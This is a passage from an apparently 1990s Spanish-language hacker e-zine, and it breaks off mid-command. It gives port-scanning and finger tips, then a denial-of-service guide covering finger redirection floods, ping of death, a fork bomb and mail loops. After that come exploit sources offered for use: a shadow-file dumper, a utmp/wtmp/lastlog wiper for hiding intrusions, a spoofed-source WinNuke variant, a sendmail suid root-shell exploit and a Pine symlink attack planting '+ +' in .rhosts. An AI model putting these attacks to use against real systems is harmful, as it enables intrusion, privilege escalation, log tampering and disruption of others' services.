nmia.com Este comando nos mostrara las computadoras conectadas a este dominio y alguna otra informacion. # telnet nmia.com 15 Ahora usamos telnet en el puerto numero 15 que permite ver las estadisticas de la red -netstat- bajo daemon y mostrara todas las computadoras conectadas a internet a traves de esta computadora. Tambien puedes intentar haciendo telnet al puerto de finger (79) para ver que sucede. Comunmente la conexion sera negada ya que la mayoria de los sysadmins no permiten el uso de finger por que muestra mucha informacion sobre los usuarios del sistema. De cualquier forma si logras entrar a un sistema que tenga en funcionamiento finger puedes preguntar por una direccion email y te dira el nombre y alguna otra informacion sobre el usuario que te ayudara a hackear el password :) Lo primero es usar whois para conseguir las computadoras conectadas a un dominio, ya que se consigan las direcciones se pueden surfear los puertos para buscar alguna falla. Una amigo de RareGaZz, GuyBrush nos ha enviado los resultados de un surfeo a ns.psi.net (192.33.4.10). Puertos abiertos ──────────────── daytime(13) discard(9) domain(53) exec(512) ftp(21) login(513) shell(514) sunrpc(111) telnet(23) time(37) uucp(540) Nuestro amigo ha intentado hacer una conexion via telnet a este sistema pero al igual que la mayoria de los sistemas protegidos nego la conexion desde su direccion IP. ( sera este un caso para DNS spoofing?? ). Para encontrar las computadoras conectadas a cierto dominio puedes hacerlo en whois.internic.net igual que como lo ha hecho GuyBrush. En esta direccion podras entrar a la base de datos de internet, tambien podras verificar direcciones I.P. entre otras cosillas. Si te conectas a un sistema importante y comienzas a surfear puertos debes recordar que la mayoria de los daemons que operan esos puertos guardan un log de los comandos usados. Bueno si quieres surfear esto es lo basico: 1) Obten una forma de usar los comandos de UNIX (cuenta shell). Como he dicho, hay distintas formas y la mas recomendable es tener Linux en tu PC y conectarla a tu ISP. Esto es complicado, si no tienes idea de como hacerlo ... mejor consiguete a alguien que pueda ayudarte. Yo en lo particular particione mi disco en dos, uno para Windows 95 (¡Hey nadie es perfecto!) y en la otra Linux. Antes de entrar se me ofrece la opcion de usar Windows o Linux. Hacer esto me costo alrededor de $50 dolares por que el programa para particionar el disco y permitir empezar una sesion con uno de los dos sistemas cuesta, ademas el cd de linux mas algo de documentacion tambien cuesta :( 2) Usa el comando "telnet <host> <numero de puerto>" donde <host> es la direccion internet de la computadora que tratas de visitar y el numero de puerto es cualquier cosa que se vea divertido. Numero de Puerto Servicio Lo que hacen 7 echo Cualquier cosa que mandes sera regresado. 9 discard Dev/null -- Basura, lo no deseado en el sys 11 systat Mucha informacion sobre los usuarios 13 La hora y fecha de la computadora host 15 netstat Mucha informacion sobre la red 19 chargen CTRL + C detiene todo lo que vomita 21 ftp Duh? 23 telnet Duh? 25 smpt Para crear email. 37 time La hora. 39 rlp Resource location 43 whois Informacion sobre la red y usuarios 70 gopher Buscador de informacion caducado 79 finger Mucha informacion sobre los usuarios 80 http Servidor Web 110 pop Email que llega 119 nntp Grupos de noticias Usenet 443 shttp Otro servidor web 513 rlogin Remote login 514 shell Comando remoto, sin password! |||||||||||||||| ||serverhacker|| |||||||||||||||| [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ 5 minutos para soltar los toros [...] ¡¡ Comienza la pamplonada !! ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] DENIAL OF SERVICE -Introduccion- -=La biblia del terrorista=- por: Swoish Los ataques conocidos como `denial of service' son en internet lo "in" o "de moda" por la facilidad con que pueden hacerse. Lo unico dificil o complicado es conseguir un servidor desde donde lanzar el ataque. Debido a la anatomia de Internet es muy dificil localizar al atacante ya que antes de llegar al objetivo una señal pasa por distintos servidores que deben ser examinados uno por uno antes de llegar al servidor hostil. El ataque consiste en descomponer servicios de un host sin permiso como ejemplo estrellar un sistema. Protegerse de este tipo de ataques es muy dificil debido a que el sistema UNIX asume que todo funciona correctamente mientras el ataque esta en progreso. Las razones por las que cualquier persona pueda estrellar un sistema son muchas y las mas probables son: -Debido al status subcultural de la persona. -Ganar acceso. -Venganza. -Razones politicas. -Razones economicas. -Por que si. Es facil ganar acceso a un sistema usando el ataque denial of service ya que es un gatillo que dispara otro tipos de `agujeros' en un sistema. Comunes ejemplos pueden ser las versiones antiguas de X-lock que permitian el acceso al sistema una vez este ha sido estrellado. Para corregir el error es necesario el acceso fisico al servidor. El inundado del Syn o Syn flooding puede ser tan solo una parte de un ataque del tipo IP-spoof. Tambien algunos programas tienen `agujeros' bajo su startup que pueden ser usados para ganar status root. Por ejemplo SSH (secure shell). Bajo un ataque se puede restringir el acceso a ciertas personas al servidor por lo tanto evitar que realizen su trabajo. EXISTEN ALGUNOS SISTEMAS OPERATIVOS MAS SEGUROS? ================================================ Esta es una pregunta dificil de contestar y creo que todo depende del administrador de un sistema UNIX. Una comparacion con Windows 95 o NT puede ser interesante debido a la gran cantidad de errores que han sido encontrados en ambos sistemas. Los sistema UNIX son mucho mas complejos y tienen cientos de programas adheridos que proporcionan diferentes servicios lo que engrandece el margen al error desde adentro. Usando Windows 95 o NT uno se arriesga a distintos metodos de estrellar la maquina que probablemente funcionarian aunque existen algunos que siempre funcionan. En realidad no existe gran diferencia entre Microsoft y UNIX excepto que en uno de los sistemas se necesita mas preparacion [ adivinen cual? ] que en el otro. Existen dos puntos importantes que deben considerarse: - Unix tiene mas herramientas de diagnostico para descubrir un ataque y monitorear a los usuarios que cualquier otro sistema. Ver que es lo que trama un usuario bajo Windows es muy dificil. - El promedio de los administradores Unix tiene mas experiencia que un tipico administrador de una red microsoft. Estos dos ultimos puntos le dan ventaja a Unix contra los ataques de negacion del servicio o denial of service. Una comparacion de Microsoft y Unix concerniendo ataques externos es mucho mas dificil. De cualquier forma es una hecho que las redes Microsoft son mas seguras que las redes Unix debido a que ofrecen menos servicios que un sistema Unix standard. OBJETIVOS BASICOS DE UN ATAQUE ============================== 1.Espacio swap ~~~~~~~~~~~~~~ La mayoria de los sistemas tienen cientos de megabytes reservados al espacio swap para resolver las peticiones del cliente. El espacio swap es tipicamente usado para forjar procesos menores que tienen un periodo de vida corto. Asi pues el espacio swap bajo ninguna causa debera ser usado rigurosamente. Una negacion de servicio podria estar basada en un metodo que trate de llenar el espacio swap. 2.Tablas del Kernel ~~~~~~~~~~~~~~~~~~~ Es trivial sobrecargar las tablas del kernel para ocasionar serios problemas al sistema. Los sistemas que escriben a traves de caches y buffers pequeños son especialmente sensitivos. Otro objetivo susceptible es el kernel memory allocation. Todo Kernel o cerebro tiene un limite para la memoria en su mapa de memoria, si el sistema alcanza este limite el cerebro no puede colocar mas memoria y el sistema debe ser reboteado. La memorial del kernel no solo es usada para procesos del CPU, monitores y asi, pero tambien para procesos ordinarios lo que significa que cualquier sistema puede ser estrellado con un buen algoritmo lo bastante rapido. [ trucos disponibles en numeros anteriores de la revista :) ] 3. RAM ~~~~~~ Una negacion del servicio que ocupe grandes cantidades de RAM puede ocasionar bastantes problemas. NFS y servidores de correo con extremadamente sensitivos porque casi nunca ocupan mucho RAM por lo tanto tienen poco RAM asignado. Un ataque a un servidor NFS es comun. El cliente de NFS normal puede hacer mucho uso del cache, pero un cliente NFS puede ser cualquier programa inclusive uno que hayas escrito tu mismo... 4. Discos ~~~~~~~~~ Un ataque clasico es llenar el disco duro. ATACANDO DESDE FUERA ==================== Usando finger ~~~~~~~~~~~~~ La mayoria de las instalaciones de fingerd dejan redireccionar a otro host. Ejemplo: $finger @sistema.dos.com@sistema.uno.com Finger en el ejemplo tendra que ir a traves del sistema.uno.com y despues al sistema.dos.com. Todo lo que el sistema.dos.com sabe es que el sistema.uno.com esta contactandole usando finger. Este metodo puede ser usado para esconderte, pero tambien para hacer uso de un truco sucio. Ejemplo: $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.que.atacamos.com Todos esos signos @ ocasionaran que finger llame a host.que.atacamos.com una y otra vez... El efecto es desastroso para host.que.atacamos.com resultando en un uso alto del ancho de banda, falta de memoria y un disco duro con menos espacio debido a todos los procesos creados. La solucion es instalar un fingerd que no soporte redirecciones, por ejemplo el finger GNU. Tambien puedes desinstalar el servicio finger. Usando telnet ~~~~~~~~~~~~~ Examina este script: while : ; do telnet sistema.que.atacamos.com & done Un ataque de este tipo comera algo del ancho de banda pero no es nada comparado con el metodo fingerd. El punto es que algunas firewalls y httpd:s piensan que el ataque es una loop y se apagan automaticamente hasta que el administrador mate el proceso con kill -HUP Broadcast Storms ~~~~~~~~~~~~~~~~ Este es un metodo muy popular en la redes donde todos los hosts actuan como gateways. Existen muchas versiones del ataque pero el metodo basico es mandar muchos paquetes a todos los hosts de la red con una direccion destino inexistente. Cada host tratara de mandar los paquetes asi que estos `rebotaran' por la red un buen rato. Los servicios que pueden ser abusados para hacer esto son ping, finger y sendmail. Email Bombing ~~~~~~~~~~~~~ En un ataque de email se envian muchos mensajes identicos a una o muchas direcciones del host. El efecto en el objetivo es un alto uso del ancho de banda y menos espacio en disco... Cuando envias muchos mensajes a una direccion inexistente del host desde otra inexistente un mensaje se convertira en 3 y regresara para convertirse en 3 de nuevo y asi... Por mas odioso que se vea este ataque es bastante efectivo y aun no es ilegal en muchos paises latinoamericanos y europeos. Ejemplo: Envia un mail de 100k a noexiste@host.atacado.com desde una direccion que no exista como noexiste@esta.direccion.duh Cuando el mensaje llege a host.atacado.com como no existe la direccion noexiste regresara el mensaje a noexiste@esta.direccion.duh y como esta direccion tampoco existe ... regresara ahora como un mensaje de 300k y asi... Otra forma de abusar el email y servidores norteamericanos es juntar varios remailers. Por ejemplo: Suponiendo que tenemos nosotros una cuenta en Geocities. Digamos uno@geocities.com y le decimos que queremos que el mail que llegue a esa direccion lo mande a dos@bigfoot.com. Ahora en la cuenta dos@bigfoot.com le decimos que lo mande a tres@iname.com. Y en la cuenta tres@iname.com le decimos que lo mande a uno@geocities.com ... Despues mandamos un mega o dos a uno@geocities.com que lo mandara a dos@bigfoot.com y de ahi a tres@iname.com y de nuevo a uno@geocities.com ... este ataque es lame si en vez de un mega mandas unos 5 !! En fin, espera represalias si te animas a hacerlo. Abuso del FTP anonimo ~~~~~~~~~~~~~~~~~~~~~ Si un servidor FTP anonimo tiene un area que pueda ser escrita puede ser abusada para un ataque de negacion del servicio. Obviamente el objeto seria llenar el disco duro. SYN FLOODING ~~~~~~~~~~~~ El mas famoso de los ataques del tipo denial of service. Phrack y 2600 han publicado extensos articulos sobre este ataque y codigo para hacerlo. El ataque se basa en un saludo entre dos hosts incompleto. El host hostil envia un paquete SYN pero no responde al paquete ACK ocasionando que el stack TCP/IP espere cierta cantidad de tiempo a que el host hostil responda antes de cerrar la conexion. Si creamos muchas peticiones de conexion y no se responde a ninguna el host estara inactivo mucho tiempo esperando respuesta ocasionando lentitud en los demas servicios. Ping Flooding ~~~~~~~~~~~~~ Este metodo tiene un gran efecto en el sistema atacado. Bajo Unix nosotros podriamos intentar algo como: ping -s host para mandar paquetes de 64 bytes. Si tienes Windows 95, has click en start, elige run y escribe: PING -T -L 256 host.que.atacamos.com y comienza 15 sesiones iguales. Crashing usando Ping ~~~~~~~~~~~~~~~~~~~~ Para detener a un sistema desde una maquina corriendo Windows 95 simplemente ejecuta: ping -l 65510 host.que.atacamos.com Y el sistema se detendra o se re-iniciara. ATACANDO DESDE DENTRO ===================== Llenando el disco duro ~~~~~~~~~~~~~~~~~~~~~~~ Si en tu sistema puedes usar el directorio temporal /tmp - /temp /pub/tmp - pub/temp - pub/incoming o /incoming entonces es posible que llenes el disco usando un script parecido a este: while : ; mkdir .xxx cd .xxx done Uso malicioso de fork() ~~~~~~~~~~~~~~~~~~~~~~~ Si alguien ejecuta este programa C++ el resultado sera un crash en la mayoria de los sistemas. #include <sys/types.h> #include <unistd.h> #include <iostream.h> main() { int x; while(x=0;x<1000000;x++) { system("uptime"); fork(); } } Para generar un ataque mas sangriento puedes cambiar el comando uptime por sync. Crear archivos dificiles de remover ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Todos los archivos pueden ser borrados pero aqui hay algunos dificiles: ( $ simboliza el prompt, ^C es igual a CTRL + C. ) 1.- $ cat > -xxx ^C $ ls -xxx $ rm -xxx rm: illegal option -- x rm: illegal option -- x rm: illegal option -- x usage: rm [-fiRr] file ... $ 2.- $ touch xxx! $ rm xxx! rm: remove xxx! (yes/no)? y $ touch xxxxxxxxx! $ rm xxxxxxxxx! bash: !": event not found $ Ataque CSH ~~~~~~~~~~ Ejecuta esto bajo /bin/csh despues de modificarlo con el path propio del shell csh de tu sistema. Busca este path en tu archivo .login |I /bin/csh nodename : **************b DUMPING CORE ============ Uso malicioso de Netscape ~~~~~~~~~~~~~~~~~~~~~~~~~ Bajo Netscape 1.1N este link resultara en un fault de segmentacion y el sistema arrojara el core. <a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx. xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx. xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx. xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx. xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...> Swoish@rdk.org [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Ser o no ser? Leyendo raregazz - hasta el amanecer ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] $$$$$ $$ "$$$$$$$$$$$$$$$" $$ ooo $$$$$ooo oooo "$$$$$$$$$$" "$$" o$$ $$o "$$$$$$$$$ $$$$$$$$$$ $$ "$$$$$$" $$ $$oo $$$$$$$$$$o """ o$$$" $$$o "$$$$" $$$ o$$" $$$"""$$"" $$$ oooo $$$$oo $$$$ $$$$$ ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$ $$$$$$$ooo $$ ooo$$$$$$$ """""""" """""" """""""" """""""""" $$$$$$$$$$$$$$$$$$$$$$$$$$ oooo ooo $$$$$$$""" $$o """$$$$$$$ ""$$ $$$$ $$$$"" $$$o ""$$$$ $$$oooo $$$$$$$o oooooo $$$ oooooo $$$" o$$$$o "$$$ "$$$$""$$o "$$$$ o$$""$$$$ $$" $$$""" $$ o$$$$$$$ $$ $$$$ $$$ "$$$$""$$$$ $$$ "" $$$$$$ "" o$$$$$$$$$$o $$$ $$o $$$o o$$$$o $$$ $$"" $$o o$$$$$$$$$$$$$$$$o o$$$$$ $$$$$ """" """""" "$$$$$$$" $$$$ $$$$$o /\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\ Exploit.- un exploit es un programa que abusa de algun error de un sistema operativo para conseguir aumentar los privilegios de un usuario o la caida del sistema. Estamos de vuelta por demanda popular y esta vez no molestaremos a los SysOps de bancos, servicios de comunicaciones ;) o cualquier otra Cia. Como unos saben algunas compañias se quejaron con raretrip por haber sacado en este zine los numeros de sus sistemas aqui en mexico por eso el niño quiso esperar que las cosas se enfriaran y nos quito esta pequeñisima parte del zine que nosotros estabamos haciendo puntualmente. El caso es que ustedes han estado solicitando mucho codigo fuente y nosotros tenemos los materiales necesarios para satisfacer sus necesidades de hacker's. .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Este codigo imprimira el archivo /etc/shadow en la mayoria de los sistemas SunOs 5.x Es necesario definir algunas constantes debido a las diferencias entre los sistemas y tambien por q' algunos operadores cambian los defaults para "proteger" su trabajo. /* This source will/should print out SHADOWPW passwd files. */ struct SHADOWPW { /* see getpwent(3) */ char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; int pw_quota; char *pw_comment; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd *getpwent(), *getpwuid(), *getpwnam(); #ifdef elxsis? /* Name of the shadow password file. Contains password and aging info */ #define SHADOWPW "/etc/shadowpw" #define SHADOWPW_PAG "/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" /* * Shadow password file pwd->pw_gecos field contains: * * <type>,<period>,<last_time>,<old_time>,<old_password> * * <type> = Type of password criteria to enforce (type int). * BSD_CRIT (0), normal BSD. * STR_CRIT (1), strong passwords. * <period> = Password aging period (type long). * 0, no aging. * else, number of seconds in aging period. * <last_time> = Time (seconds from epoch) of the last password * change (type long). * 0, never changed.n * <old_time> = Time (seconds from epoch) that the current password * was made the <old_password> (type long). * 0, never changed.ewromsinm * <old_password> = Password (encrypted) saved for an aging <period> to * prevent reuse during that period (type char [20]). * "*******", no <old_password>. */ /* number of tries to change an aged password */ #define CHANGE_TRIES 3 /* program to execute to change passwords */ #define PASSWD_PROG "/bin/passwd" /* Name of the password aging exempt user names and max number of entires */ #define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT 100 /* Password criteria to enforce */ #define BSD_CRIT 0 /* Normal BSD password criteria */ #define STR_CRIT 1 /* Strong password criteria */ #define MAX_CRIT 1 #endif elxsi #define NULL 0 main() { struct passwd *p; int i; for (;1;) {; p=getpwent(); if (p==NULL) return; printpw(p); } } printpw(a) struct SHADOWPW *a; { printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, a->pw_gecos,a->pw_dir,a->pw_shell); } /* SunOS 5.0 /etc/shadow */ /* SunOS4.1+c2 /etc/security/passwd.adjunct */ .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Este es un exploit para limpiar los archivos que guardan importantes logs de una entrada ilegitima. Tambien es necesario verificar que los archivos se localicen donde el codigo lo defina o modificarlo antes de compilar. #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Now...that was as bad as shit!\n"); } .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Una version mejorada de WinNuke(c) por HeTak. La diferencia de este codigo es la adaptacion de un IP Spoofer para que la persona bombardeada no sepa de donde provienen las bombas. Lamerz Note: Bombardea solo redes Windows. /* ************************************************************ */=0A= /* WinBomber 0.9 by HeTak 05.10.97 */=0A= /* */=0A= /* This simply demonstrates shitty Win networking by */=0A= /* sending Out of Bound Message flag in Ba ACK packet. */=0A= /* The difference between winnuke.c is that WinBomber */=0A= /* spoofs source ip (you) for extra security so the person */=0A= /* who will get nuked will not know who sent the nuke. */=0A= /* FOR EDUCATIONAL PURPOSES ONLY. */=0A= /* Sometimes I'm on irc, find me there for any questions. */=0A= /* */=0A= /* ************************************************************ */=0A= =0A= =0A= =0A= =0A= #include <unistd.h>=0A= =0A= #include <netinet/in.h>=0A= #include <netinet/in_systm.h>=0A= #include <netinet/ip.h>=0A= #include <netinet/tcp.h>=0A= #include <netinet/protocols.h>=0A= #include <arpa/inet.h>=0A= #include <string.h>=0A= #include <sys/types.h>=0A= #include <sys/socket.h>=0A= #include <stdio.h>=0A= #include <netinet/in.h>=0A= #include <netdb.h>=0A= #include <errno.h>=0A= =0A= #define PACKET_SIZE sizeof(struct tcppkt)=0A= #define DEF_BADDR "132.45.6.8"=0A= =0A= struct tcppkt {=0A= struct iphdr ip;=0A= struct tcphdr tcp;=0A= };=0A= =0A= =0A= =0A= unsigned short in_chksum(addr, len)=0A= u_short *addr;=0A= int len;=0A= {=0A= register int nleft =3D len;=0A= register u_short *w =3D addr;=0A= register int sum =3D0;=0A= u_short answer =3D0;=0A= =0A= while(nleft > 1) {=0A= sum+=3D *w++;=0A= nleft -=3D 2;=0A= }=0A= =0A= if (nleft =3D=3D 1) {=0A= *(u_char *) (&answer) =3D *(u_char *) w;=0A= sum+=3Danswer;=0A= }=0A= =0A= sum =3D (sum >> 16) + ( sum & 0xffff);=0A= sum +=3D (sum >> 16);=0A= answer =3D ~sum;=0A= return (answer);=0A= }=0A= =0A= =0A= =0A= /* = ********************************************************************** = */=0A= =0A= int bombaway(sin, fakesock, saddr)=0A= struct sockaddr_in *sin;=0A= u_long saddr;=0A= int fakesock;=0A= {=0A= register struct iphdr *ip;=0A= register struct tcphdr *tcp;=0A= register char *php;=0A= static char packet[PACKET_SIZE];=0A= static char phead[PACKET_SIZE+12];=0A= u_short len =3D0;=0A= u_short sport =3D 5150;=0A= =0A= ip =3D (struct iphdr *) packet;=0A= =0A= ip->ihl =3D 5;=0A= ip->version =3D 4;=0A= ip->tos =3D 0;=0A= ip->tot_len =3D htons(PACKET_SIZE);=0A= ip->id =3D htons(918 + (rand()%32768));=0A= ip->frag_off =3D 0;=0A= ip->ttl =3D 255;=0A= ip->protocol =3D IPPROTO_TCP;=0A= ip->check =3D 0;=0A= ip->saddr =3D saddr;=0A= ip->daddr =3D sin->sin_addr.s_addr; =0A= =0A= tcp =3D (struct tcphdr *)(packet + sizeof(struct iphdr));=0A= tcp->th_sport =3D htons(sport++);=0A= tcp->th_dport =3D htons(sin->sin_port);=0A= tcp->th_seq =3D htonl(31337);=0A= tcp->th_ack =3D 0; =0A= tcp->th_x2 =3D 0;=0A= tcp->th_off =3D 5;=0A= tcp->th_flags =3D TH_ACK; /* Maybe could use some other flag */=0A= tcp->th_win =3D htons(10052); =0A= tcp->th_sum =3D 0; =0A= tcp->th_urp =3D 0; =0A= php =3D phead;=0A= memset(php, 0, PACKET_SIZE + 12);=0A= memcpy(php, &(ip->saddr), 8);=0A= php +=3D 9;=0A= memcpy(php, &(ip->protocol), 1);=0A= len =3D htons(sizeof(struct tcphdr));=0A= memcpy(++php, &(len), 2);=0A= php +=3D 2;=0A= memcpy(php, tcp, sizeof(struct tcphdr));=0A= =0A= tcp->th_sum =3D in_chksum(php, sizeof(struct tcphdr)+12);=0A= =0A= =0A= return (sendto(fakesock, packet, PACKET_SIZE, MSG_OOB, (struct = sockaddr *) sin,=0A= sizeof(struct sockaddr_in)));=0A= }=0A= =0A= /* = *********************************************************************** = */=0A= =0A= =0A= =0A= =0A= u_long=0A= resolve(host)=0A= char *host;=0A= {=0A= struct hostent *he;=0A= u_long addr;=0A= if ((he =3D gethostbyname(host)) =3D=3D NULL) {=0A= addr =3D inet_addr(host);=0A= }=0A= else {=0A= bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));=0A= }=0A= return (addr);=0A= }=0A= =0A= =0A= main(argc, argv)=0A= =0A= int argc;=0A= char **argv;=0A= {=0A= =0A= int mainsock, fakesock, bombs;=0A= u_short dport;=0A= u_long saddr, daddr;=0A= struct sockaddr_in sin;=0A= struct hostent *host;=0A= bombs =3D saddr =3D 0;=0A= =0A= =0A= /* = ************************************************************************= **************** */=0A= =0A= =0A= if (argc<3)=0A= {=0A= printf("Usage: %s <source> <destination> \n", argv[0]);=0A= exit();=0A= }=0A= =0A= =0A= =0A= if ((daddr =3D resolve(argv[2])) =3D=3D -1) { /* Resolve destination = */=0A= printf("Unable to resolve destination hostname -> %s\n", argv[2]);=0A= exit(1);=0A= }=0A= =0A= if ((saddr =3D resolve(argv[1])) =3D=3D -1) {=0A= printf("Bad spoofed source -> %s\nOhh well...using default.\n\n", = argv[1]);=0A= saddr=3Dinet_addr(DEF_BADDR);=0A= }=0A= =0A= =0A= dport =3D 139;=0A= =0A= /* = ************************************************************************= **************** */ =0A= =0A= =0A= bzero(&sin, sizeof(struct sockaddr_in));=0A= sin.sin_family=3DAF_INET;=0A= sin.sin_addr.s_addr=3Ddaddr;=0A= sin.sin_port=3Dhtons(139); =0A= =0A= =0A= /* = ***************************************************************** */=0A= =0A= if ((mainsock =3D socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {=0A= perror("Unable to open main socket.");=0A= exit(1);=0A= }=0A= =0A= if ((fakesock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {=0A= perror("Unable to open raw socket.");=0A= exit(1);=0A= }=0A= =0A= =0A= if (connect(mainsock, (struct sockaddr *)&sin, 16)=3D=3D -1) {=0A= perror("Unable to open connection:");=0A= close(mainsock);=0A= }=0A= =0A= /* = ***************************************************************** */ = =0A= =0A= printf("WiNBomber 0.9 by HeTak.\n");=0A= printf("Connection established.\n");=0A= printf("Sending <%d> bombs to port <%d> to <%s>...\n", =0A= bombs, ntohs(sin.sin_port), argv[2] );=0A= printf("Ready to bomb. Sleeping for a while.\n");=0A= sleep(3);=0A= while(bombs!=3D10) {=0A= printf("<%s> >=3D----=3D|B+O+M+B|=3D-----> <%s:139>\t# <%d>\n",=0A= argv[1], argv[2], bombs);=0A= bombaway(&sin, fakesock, saddr);=0A= usleep(100000);=0A= bombs++;=0A= }=0A= printf("Bombs dropped.\n");=0A= exit(0);=0A= }=0A= =0A= =0A= =0A= =0A= .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Exte exploit es conocido como sendmail v.8.8.4 Crea una programa suid en /tmp/x que consigue shell root. Modifica el directorio temporal segun el sistema. cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Este es una buena forma de hackear Pine en sistemas Linux. Viendo la tabla de procesos con ps se puede ver quien esta corriendo PINE, ahora uno puede hacer ls en el directorio temporal (/tmp) para recoger los nombres lockfile de cada usuario. La tabla de procesos otra vez revelara cuando un usuario termine PINE o termine de leer sus mensajes del buzon de ingreso y borrando su archivo lockfile. Creando un link simbolico de /tmp/.hamors_lockfile a ~hamors/.rhosts (como un ejemplo) causara que PINE haga un archivo ~hamors/.rhosts como un archivo 666 con la ID de proceso como su contenido. Una persona puede hacer un echo "+ +" > /tmp/.hamors_lockfile y despues remover -rm- el archivo /tmp/.hamors_lockfile Esto fue escrito por Sean B. Hamor y para este ejemplo hamors es la victima mientras catluvr el atacante. hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > 